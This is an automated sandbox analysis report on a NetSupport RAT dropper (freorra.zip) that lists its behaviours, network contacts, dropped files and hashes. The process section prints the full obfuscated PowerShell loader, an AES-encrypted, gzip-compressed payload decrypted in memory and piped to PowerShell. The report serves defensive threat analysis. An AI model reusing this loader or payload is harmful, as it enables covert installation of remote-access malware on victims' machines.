Analysis Overview
SHA256
1cdbdf9476b04724e12564394094ffa0f74e5345b2fd4d26a78749c408d34f8e
Threat Level: Known bad
The file freorra.zip was found to be: Known bad.
Malicious Activity Summary
NetSupport
Blocklisted process makes network request
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-25 13:56
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-25 13:56
Reported
2024-01-25 13:59
Platform
win10v2004-20231222-en
Max time kernel
144s
Max time network
146s
Command Line
Signatures
NetSupport
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\freorra.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $TXrH = 'AAAAAAAAAAAAAAAAAAAAALgoMIpXuiI6hGAhDsh3cJWwBb7QNE/LADXObYijVjWtxjRg/erskurYB0bHeZOKqF4CFw8yxVGBj/V854KAZi45qjmxBh8Sp7nADYvtuZg5JvdH9DB453dLjjhbpYt1TbWvJABEbgfBx984MdG2Y31vv1vvjYenwcGn2aGBbJlsc8ZTNIfpu3FbQPC0+PbcUZZNXwArWzvi2ekld3wnfv0FQwUphxilv3W2KnLGcJ28FeOz263ZcPelR3I94DxsGQn+WUTLDAkce5K77G7oV1DtOdnypYcIu+7D4caMvuhiywazKzCz4coAy05LrxwogHYTxQSxnV1VDoPbko4J5fAnfz8S7GPbs7QP0QpZUiyWojTvOXkVJjmyAAFv052kHslxkYz5IHdiLLgy1x97fI8UmN/8k5m1P4UvNtshcnu+9AHkYUW0q+pTFS7j1/zbyIdXkDB60nXKIvClOUZ4kuIM64ykKTLxDu9BPX7zEsaQ9kbEUCja3MLsffMuTsVFndQGah4WlH6dSSZUbU6KGnH9+PIx1YeKzpkUQuyzK8bxrsyST3QfEqzMktkt8KkEX0NcBE8ZzL+eWSCPTgZNjiKVSYNaQ2/7jUVd+ZRvdX4SN1pDXlfCPxOHNsbTKlbCBLkNT6LpF8IlhBciDnBFqdoB8Ai/oAn8+bQUi44AQgAFso2d0PWok5578jGnbGVb5mpBxe64to+dNLBvysTQRSSH8YuyvS0fU2sNXkgu1w/BFxyTTXE6xoMDmE3FzclKVE2SJjOjljZEqtN+HploPSJLUHzdwAAxF+QdFzYLAHhBJvVTyXwCj47cNIFzIYJ11p45L1t4TtnMrPRf4ebqCyM8zU7W1Ot4wmEfJQeydAkaQdQLq7g/nWO2EQpNCMOZWHjaU16WhPM7rEFWr2EtNAscFkSA2hLokAt8TsVE9KDS+B7O29zBh+NI53ykRWgPn0168OPztlvljgCbma3Xy3HkLtWxsoJ42L8NzT16vKahO/sRCfGckm1y10bH2LtaIS5wVHpOV6wkvC7UM4Qwebp0IEDRbLJ7SMe1LHX91xlPzthqvN7q5yOdMt8kYl2+kI4a3wBPHKfCrwaoX3Gx8+QYg2quKy3GpQNuAQhZn0vaQbJbbsZf2ERD0Jgp3BiKKfKvZ3H6MV4lIcu99w+MI7vQEM1nn1Y5Pfij1PdnGm6RNqPnlW/gY37EZSlqaUPZE2YlFT2SD41rqzSQ/O2RErCj6DTOa1we6UT0y1RtZI0/SYvyRyPJJSV16ppu6K8JTuTephe/UuuyXC06nACft+1jc/NgDqxCLL85NCNp5KanqLiIyIMcOitJe34VpFkw+K+4kTvlabUucxlKGU4Oj1wlXDGcUOIwCfspI17dJTGhIwlofVWr8D4+Ui+iUrDK7tlJTvTwCSf3zIwdvhOMkt37MGOGgMa1ClgiuCzvTnjpRyoxjfN/4EWhDsqmWUv5pJATyiSL1sHmdGr6UoOwAG2Tf8vCRXcJsPeDguyaa5Ff56cjjaNnuJ6PaKkmQPDrhrAndL0u4+cdwCXIENm2W9s=';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS | powershell - }
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell.exe $TXrH = 'AAAAAAAAAAAAAAAAAAAAALgoMIpXuiI6hGAhDsh3cJWwBb7QNE/LADXObYijVjWtxjRg/erskurYB0bHeZOKqF4CFw8yxVGBj/V854KAZi45qjmxBh8Sp7nADYvtuZg5JvdH9DB453dLjjhbpYt1TbWvJABEbgfBx984MdG2Y31vv1vvjYenwcGn2aGBbJlsc8ZTNIfpu3FbQPC0+PbcUZZNXwArWzvi2ekld3wnfv0FQwUphxilv3W2KnLGcJ28FeOz263ZcPelR3I94DxsGQn+WUTLDAkce5K77G7oV1DtOdnypYcIu+7D4caMvuhiywazKzCz4coAy05LrxwogHYTxQSxnV1VDoPbko4J5fAnfz8S7GPbs7QP0QpZUiyWojTvOXkVJjmyAAFv052kHslxkYz5IHdiLLgy1x97fI8UmN/8k5m1P4UvNtshcnu+9AHkYUW0q+pTFS7j1/zbyIdXkDB60nXKIvClOUZ4kuIM64ykKTLxDu9BPX7zEsaQ9kbEUCja3MLsffMuTsVFndQGah4WlH6dSSZUbU6KGnH9+PIx1YeKzpkUQuyzK8bxrsyST3QfEqzMktkt8KkEX0NcBE8ZzL+eWSCPTgZNjiKVSYNaQ2/7jUVd+ZRvdX4SN1pDXlfCPxOHNsbTKlbCBLkNT6LpF8IlhBciDnBFqdoB8Ai/oAn8+bQUi44AQgAFso2d0PWok5578jGnbGVb5mpBxe64to+dNLBvysTQRSSH8YuyvS0fU2sNXkgu1w/BFxyTTXE6xoMDmE3FzclKVE2SJjOjljZEqtN+HploPSJLUHzdwAAxF+QdFzYLAHhBJvVTyXwCj47cNIFzIYJ11p45L1t4TtnMrPRf4ebqCyM8zU7W1Ot4wmEfJQeydAkaQdQLq7g/nWO2EQpNCMOZWHjaU16WhPM7rEFWr2EtNAscFkSA2hLokAt8TsVE9KDS+B7O29zBh+NI53ykRWgPn0168OPztlvljgCbma3Xy3HkLtWxsoJ42L8NzT16vKahO/sRCfGckm1y10bH2LtaIS5wVHpOV6wkvC7UM4Qwebp0IEDRbLJ7SMe1LHX91xlPzthqvN7q5yOdMt8kYl2+kI4a3wBPHKfCrwaoX3Gx8+QYg2quKy3GpQNuAQhZn0vaQbJbbsZf2ERD0Jgp3BiKKfKvZ3H6MV4lIcu99w+MI7vQEM1nn1Y5Pfij1PdnGm6RNqPnlW/gY37EZSlqaUPZE2YlFT2SD41rqzSQ/O2RErCj6DTOa1we6UT0y1RtZI0/SYvyRyPJJSV16ppu6K8JTuTephe/UuuyXC06nACft+1jc/NgDqxCLL85NCNp5KanqLiIyIMcOitJe34VpFkw+K+4kTvlabUucxlKGU4Oj1wlXDGcUOIwCfspI17dJTGhIwlofVWr8D4+Ui+iUrDK7tlJTvTwCSf3zIwdvhOMkt37MGOGgMa1ClgiuCzvTnjpRyoxjfN/4EWhDsqmWUv5pJATyiSL1sHmdGr6UoOwAG2Tf8vCRXcJsPeDguyaa5Ff56cjjaNnuJ6PaKkmQPDrhrAndL0u4+cdwCXIENm2W9s=';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS | powershell -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe $TXrH = 'AAAAAAAAAAAAAAAAAAAAALgoMIpXuiI6hGAhDsh3cJWwBb7QNE/LADXObYijVjWtxjRg/erskurYB0bHeZOKqF4CFw8yxVGBj/V854KAZi45qjmxBh8Sp7nADYvtuZg5JvdH9DB453dLjjhbpYt1TbWvJABEbgfBx984MdG2Y31vv1vvjYenwcGn2aGBbJlsc8ZTNIfpu3FbQPC0+PbcUZZNXwArWzvi2ekld3wnfv0FQwUphxilv3W2KnLGcJ28FeOz263ZcPelR3I94DxsGQn+WUTLDAkce5K77G7oV1DtOdnypYcIu+7D4caMvuhiywazKzCz4coAy05LrxwogHYTxQSxnV1VDoPbko4J5fAnfz8S7GPbs7QP0QpZUiyWojTvOXkVJjmyAAFv052kHslxkYz5IHdiLLgy1x97fI8UmN/8k5m1P4UvNtshcnu+9AHkYUW0q+pTFS7j1/zbyIdXkDB60nXKIvClOUZ4kuIM64ykKTLxDu9BPX7zEsaQ9kbEUCja3MLsffMuTsVFndQGah4WlH6dSSZUbU6KGnH9+PIx1YeKzpkUQuyzK8bxrsyST3QfEqzMktkt8KkEX0NcBE8ZzL+eWSCPTgZNjiKVSYNaQ2/7jUVd+ZRvdX4SN1pDXlfCPxOHNsbTKlbCBLkNT6LpF8IlhBciDnBFqdoB8Ai/oAn8+bQUi44AQgAFso2d0PWok5578jGnbGVb5mpBxe64to+dNLBvysTQRSSH8YuyvS0fU2sNXkgu1w/BFxyTTXE6xoMDmE3FzclKVE2SJjOjljZEqtN+HploPSJLUHzdwAAxF+QdFzYLAHhBJvVTyXwCj47cNIFzIYJ11p45L1t4TtnMrPRf4ebqCyM8zU7W1Ot4wmEfJQeydAkaQdQLq7g/nWO2EQpNCMOZWHjaU16WhPM7rEFWr2EtNAscFkSA2hLokAt8TsVE9KDS+B7O29zBh+NI53ykRWgPn0168OPztlvljgCbma3Xy3HkLtWxsoJ42L8NzT16vKahO/sRCfGckm1y10bH2LtaIS5wVHpOV6wkvC7UM4Qwebp0IEDRbLJ7SMe1LHX91xlPzthqvN7q5yOdMt8kYl2+kI4a3wBPHKfCrwaoX3Gx8+QYg2quKy3GpQNuAQhZn0vaQbJbbsZf2ERD0Jgp3BiKKfKvZ3H6MV4lIcu99w+MI7vQEM1nn1Y5Pfij1PdnGm6RNqPnlW/gY37EZSlqaUPZE2YlFT2SD41rqzSQ/O2RErCj6DTOa1we6UT0y1RtZI0/SYvyRyPJJSV16ppu6K8JTuTephe/UuuyXC06nACft+1jc/NgDqxCLL85NCNp5KanqLiIyIMcOitJe34VpFkw+K+4kTvlabUucxlKGU4Oj1wlXDGcUOIwCfspI17dJTGhIwlofVWr8D4+Ui+iUrDK7tlJTvTwCSf3zIwdvhOMkt37MGOGgMa1ClgiuCzvTnjpRyoxjfN/4EWhDsqmWUv5pJATyiSL1sHmdGr6UoOwAG2Tf8vCRXcJsPeDguyaa5Ff56cjjaNnuJ6PaKkmQPDrhrAndL0u4+cdwCXIENm2W9s=';$wxWgH = 'SWFxeExKaHRER3pMQUdKVEtEQUhkeUNoTFVXR0tWaEw=';$CEOmdHTE = New-Object 'System.Security.Cryptography.AesManaged';$CEOmdHTE.Mode = [System.Security.Cryptography.CipherMode]::ECB;$CEOmdHTE.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$CEOmdHTE.BlockSize = 128;$CEOmdHTE.KeySize = 256;$CEOmdHTE.Key = [System.Convert]::FromBase64String($wxWgH);$pnTxK = [System.Convert]::FromBase64String($TXrH);$aMhCKShb = $pnTxK[0..15];$CEOmdHTE.IV = $aMhCKShb;$pWmtDyKaS = $CEOmdHTE.CreateDecryptor();$ITgvgxojq = $pWmtDyKaS.TransformFinalBlock($pnTxK, 16, $pnTxK.Length - 16);$CEOmdHTE.Dispose();$GQHIEKgG = New-Object System.IO.MemoryStream( , $ITgvgxojq );$akmEE = New-Object System.IO.MemoryStream;$jlseYdskN = New-Object System.IO.Compression.GzipStream $GQHIEKgG, ([IO.Compression.CompressionMode]::Decompress);$jlseYdskN.CopyTo( $akmEE );$jlseYdskN.Close();$GQHIEKgG.Close();[byte[]] $toUVnm = $akmEE.ToArray();$JuOsS = [System.Text.Encoding]::UTF8.GetString($toUVnm);$JuOsS
C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe
"C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | johnmmartin.com | udp |
| US | 74.220.219.201:443 | johnmmartin.com | tcp |
| US | 8.8.8.8:53 | 201.219.220.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 5.181.159.27:443 | tcp | |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| US | 172.67.68.212:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 27.159.181.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.68.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
Files
memory/1564-0-0x0000000004A40000-0x0000000004A76000-memory.dmp
memory/1564-1-0x00000000712A0000-0x0000000071A50000-memory.dmp
memory/1564-2-0x0000000004BB0000-0x0000000004BC0000-memory.dmp
memory/1564-3-0x0000000004BB0000-0x0000000004BC0000-memory.dmp
memory/1564-4-0x00000000051F0000-0x0000000005818000-memory.dmp
memory/1564-5-0x0000000005140000-0x0000000005162000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_skrky3v0.14q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1564-7-0x00000000059C0000-0x0000000005A26000-memory.dmp
memory/1564-6-0x0000000005950000-0x00000000059B6000-memory.dmp
memory/1564-17-0x0000000005B30000-0x0000000005E84000-memory.dmp
memory/1564-18-0x0000000005FE0000-0x0000000005FFE000-memory.dmp
memory/1564-19-0x0000000006020000-0x000000000606C000-memory.dmp
memory/1564-21-0x00000000064D0000-0x00000000064EA000-memory.dmp
memory/1564-20-0x00000000071C0000-0x0000000007256000-memory.dmp
memory/1564-22-0x0000000006520000-0x0000000006542000-memory.dmp
memory/1564-23-0x0000000007810000-0x0000000007DB4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | def65711d78669d7f8e69313be4acf2e |
| SHA1 | 6522ebf1de09eeb981e270bd95114bc69a49cda6 |
| SHA256 | aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c |
| SHA512 | 05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7 |
memory/5420-28-0x00000000712A0000-0x0000000071A50000-memory.dmp
memory/1564-27-0x00000000712A0000-0x0000000071A50000-memory.dmp
memory/5024-29-0x00000000712A0000-0x0000000071A50000-memory.dmp
memory/5420-35-0x0000000005770000-0x0000000005AC4000-memory.dmp
memory/5420-45-0x00000000026C0000-0x00000000026D0000-memory.dmp
memory/5024-46-0x0000000001280000-0x0000000001290000-memory.dmp
memory/5420-51-0x00000000026C0000-0x00000000026D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4507389c880d5830ec176a93e8e84f25 |
| SHA1 | c9e10d68857a1dec9bcdbc7d1806a2c13a0772c3 |
| SHA256 | fb6548e51e98b32c382b396ebc6cea76886645f1395735d05a4b02da9cb565fe |
| SHA512 | 42f5e17a6c0536fa27eb2b83370851bf96a61b801c65e12bd2b99dbb1cc80a1c32aacf781de926f76c919c8bfa2344bbd057f63e4939ab62fb582213f117e673 |
memory/5024-53-0x0000000007410000-0x0000000007454000-memory.dmp
memory/5420-54-0x0000000007820000-0x0000000007E9A000-memory.dmp
memory/5024-55-0x00000000077B0000-0x0000000007826000-memory.dmp
memory/5420-57-0x00000000712A0000-0x0000000071A50000-memory.dmp
memory/5024-60-0x000000007F000000-0x000000007F010000-memory.dmp
memory/5024-61-0x0000000007D80000-0x0000000007DB2000-memory.dmp
memory/5024-62-0x000000006DB60000-0x000000006DBAC000-memory.dmp
memory/5024-63-0x000000006DF00000-0x000000006E254000-memory.dmp
memory/5024-74-0x0000000007DC0000-0x0000000007DDE000-memory.dmp
memory/5024-69-0x0000000001280000-0x0000000001290000-memory.dmp
memory/5024-75-0x0000000001280000-0x0000000001290000-memory.dmp
memory/5024-76-0x0000000007DE0000-0x0000000007E83000-memory.dmp
memory/5024-77-0x0000000008560000-0x000000000856A000-memory.dmp
memory/5024-78-0x0000000008580000-0x0000000008591000-memory.dmp
memory/5024-80-0x00000000085A0000-0x00000000085AA000-memory.dmp
memory/5024-79-0x00000000085D0000-0x00000000085E2000-memory.dmp
C:\Users\Admin\AppData\Roaming\ForgotME\digitaks.exe
| MD5 | 8d9709ff7d9c83bd376e01912c734f0a |
| SHA1 | e3c92713ce1d7eaa5e2b1fabeb06cdc0bb499294 |
| SHA256 | 49a568f8ac11173e3a0d76cff6bc1d4b9bdf2c35c6d8570177422f142dcfdbe3 |
| SHA512 | 042ad89ed2e15671f5df67766d11e1fa7ada8241d4513e7c8f0d77b983505d63ebfb39fefa590a2712b77d7024c04445390a8bf4999648f83dbab6b0f04eb2ee |
C:\Users\Admin\AppData\Roaming\ForgotME\PCICL32.dll
| MD5 | 58636544dd9ef8d3439a130b2216cb8b |
| SHA1 | 46ccc91639ec23cb3357cb9050105470318e54ec |
| SHA256 | 6f2949eb5239f4e4c76a4412cd79581f117049211e322aa7f96533237b349999 |
| SHA512 | 0d82372732a0ff1ee13e78fbc40c7c865f1dbb557f3bcdb9c015528bc77a5b18335ad15e26108d4815e22924d0674a71a6b49c8db7fcbdfae506035176bdc9ed |
C:\Users\Admin\AppData\Roaming\ForgotME\PCICL32.DLL
| MD5 | 21929aa8519224f82c1cb7e669ea8d7c |
| SHA1 | 1d0b01c984ea00d1e259a938d7ec84a95c8ddb79 |
| SHA256 | d4da75278909c393fe6be9e886d35bf8c40c3c23ddd6e76adb8a8844c5aa3c5c |
| SHA512 | 784889c5428fb874056de1ebfcc3136a7a59a30f1a646bb90c64a7325a3afef5b9406a0d94e98e6b4040994b2e3440a6249c44b868bc830c1e4e16b4f1f2d548 |
C:\Users\Admin\AppData\Roaming\ForgotME\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\ForgotME\PCICHEK.DLL
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\ForgotME\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\ForgotME\client32.ini
| MD5 | bbaa3f64ab41cc6b8e3c04fe0c17849c |
| SHA1 | 0d2076ee4445e5ee6fdb15789b817e6a133b43fa |
| SHA256 | 643fa4dae006fd49339ca9b5f19e337e1d4e96fa2bddb01028ce8601e157c6fb |
| SHA512 | 555753c751a398dae0e6991cc35c166e7b2d84d453901ad7d79c9343784bf22ee45bb389f8cd3aff22e0cc5e36c20c1ba221dd63e1d10d3dc49f994b428a45f3 |
C:\Users\Admin\AppData\Roaming\ForgotME\NSM.LIC
| MD5 | 7067af414215ee4c50bfcd3ea43c84f0 |
| SHA1 | c331d410672477844a4ca87f43a14e643c863af9 |
| SHA256 | 2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12 |
| SHA512 | 17b888087192bcea9f56128d0950423b1807e294d1c4f953d1bf0f5bd08e5f8e35afeee584ebf9233bfc44e0723db3661911415798159ac118c8a42aaf0b902f |
C:\Users\Admin\AppData\Roaming\ForgotME\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
memory/5024-147-0x00000000712A0000-0x0000000071A50000-memory.dmp